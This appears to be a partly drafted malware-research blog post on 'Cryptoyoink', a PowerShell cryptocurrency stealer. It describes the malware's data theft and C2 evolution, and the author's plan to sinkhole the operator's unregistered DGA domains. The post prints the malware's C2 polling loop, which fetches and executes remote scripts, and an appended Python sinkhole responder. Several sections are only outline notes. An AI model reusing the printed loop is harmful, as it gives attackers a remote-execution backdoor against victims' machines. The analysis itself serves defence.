Recently, I’ve been tracking the evolution of a piece of malware that I’ve started to call Cryptoyoink (kudos to @alicynx for the name!), a multi-stage cryptostealer written in PowerShell. Cryptoyoink isn’t particularly innovative, but it takes advantage of common blind spots in traditional antimalware, and the author(s) behind it have been refining their operations over at least the past four months.

Xavier Mertens first posted a deep-dive on this cryptostealer on the SANS ISC blog on June 22nd, and at the time VirusTotal showed that only 1 out of 53 vendors flagged it as malicious.

What Xavier didn’t cover in depth is how Cryptoyoink’s C2 works, which piqued my interest after I noticed that Cryptoyoink’s current C2 domains rank in the top 100k most popular domains according to Cloudflare Radar, and around the top 200k most popular domains according to Cisco Umbrella. In total, Cryptoyoink’s C2 accounts for over 500 million DNS requests per week.

So, what does Cryptoyoink do? How has Cryptoyoink’s C2 changed over time? Is this a massive threat that’s been underreported, or what’s going on to cause so much traffic?

Perhaps most importantly, can I ruin Cryptoyoink’s operator’s day?

Payload: Cryptoyoink’s Cryptostealer

As mentioned prior, I’m not the first person to discover the cryptostealer I’m calling Cryptoyoink. The first mention of this malware that I can find was on malware removal forums starting in mid-May 2022, such as this thread reporting a risky connection to

The first deep dive into Cryptoyoink was published by Xavier Mertens on the SANS ISC blog on June 22nd. This first publicly-known version had a very low score on VirusTotal at the time (1/53) and does the following:

  • Collects details about the infected computer, such as user information and antivirus status.
  • Searches for cryptocurrency extensions (e.g. wallets) in the Chrome, Brave, and Edge browsers.
  • Reports user data and relevant extensions to over HTTP.
  • Runs any commands given in’s response; presumably these would be commands to steal sensitive information.

This sample also included another PowerShell script - commented out - that would monitor the clipboard for wallet addresses.

first deeper dive by xme at SANS ISC


jul 5:

sept 26:

Cryptoyoink’s C2 Client

Original C2 Client (May/June)

first user report I can find

user reports in June: no DGA, simple invocation, script hidden in drivers (noisy)

while ($true) {
  try {
    # poll the C2 for a script body (the C2 URI was elided from the original report)
    $r = Invoke-RestMethod -Uri ''
    if ($r -ne '') {
      # run whatever the C2 returned as a script block and wait for it to finish
      Start-Job ([ScriptBlock]::Create($r)) | Wait-Job
    }
  }
  catch {}
  Start-Sleep 2
}

automated analysis around may 23 in hybrid-analysis

C2 Client Adds a DGA

user reports in July: new DGA

C2 Client Goes Fileless

here’s how the new version gets installed (registry, xor, run)

how the new C2 DGA works

oh btw the operator didn’t register nine of its C2 domains, so I did; tune in next time …
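To make the point of the original C2 loop and of registering the unregistered DGA domains concrete, here is an added example of a minimal sinkhole responder (my own illustration, not code from the post or from the malware). It assumes a registered DGA domain points at this server; since the client only executes a non-empty response body, the sinkhole always answers 200 with an empty body and records each poll as one JSON line for telemetry. The real client's request path and headers are not on the page, so every request is logged.

```python
"""Sinkhole responder for the Cryptoyoink C2 polling loop (added example).

Assumption: one of the unregistered DGA domains resolves to this host.
The client's `if ($r -ne '')` check means an empty body gives it nothing
to run, so it just sleeps and polls again while we collect telemetry.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import time


def build_response(client_ip, method, path, headers):
    """Return (status, body, log_record) for one poll.

    The body is always empty so the client never has script text to execute.
    The log record is what a sinkhole operator keeps for victim counting.
    """
    record = {
        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "src": client_ip,
        "method": method,
        "path": path,
        "host": headers.get("Host", ""),
        "ua": headers.get("User-Agent", ""),
    }
    return 200, b"", record


class SinkholeHandler(BaseHTTPRequestHandler):
    def _serve(self):
        status, body, record = build_response(
            self.client_address[0], self.command, self.path, self.headers)
        print(json.dumps(record))  # one JSON line per poll, easy to aggregate later
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = do_POST = _serve

    def log_message(self, *args):  # silence the default stderr access log
        pass


if __name__ == "__main__":
    # listen on a constructed port; put it behind TLS termination in practice
    HTTPServer(("0.0.0.0", 8080), SinkholeHandler).serve_forever()
```

The JSON lines give per-source-IP counts of polling hosts, which is how a sinkhole turns a weak DGA into a victim census rather than a working C2.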

Ruining the Day

and this is why your DGA needs to be better kids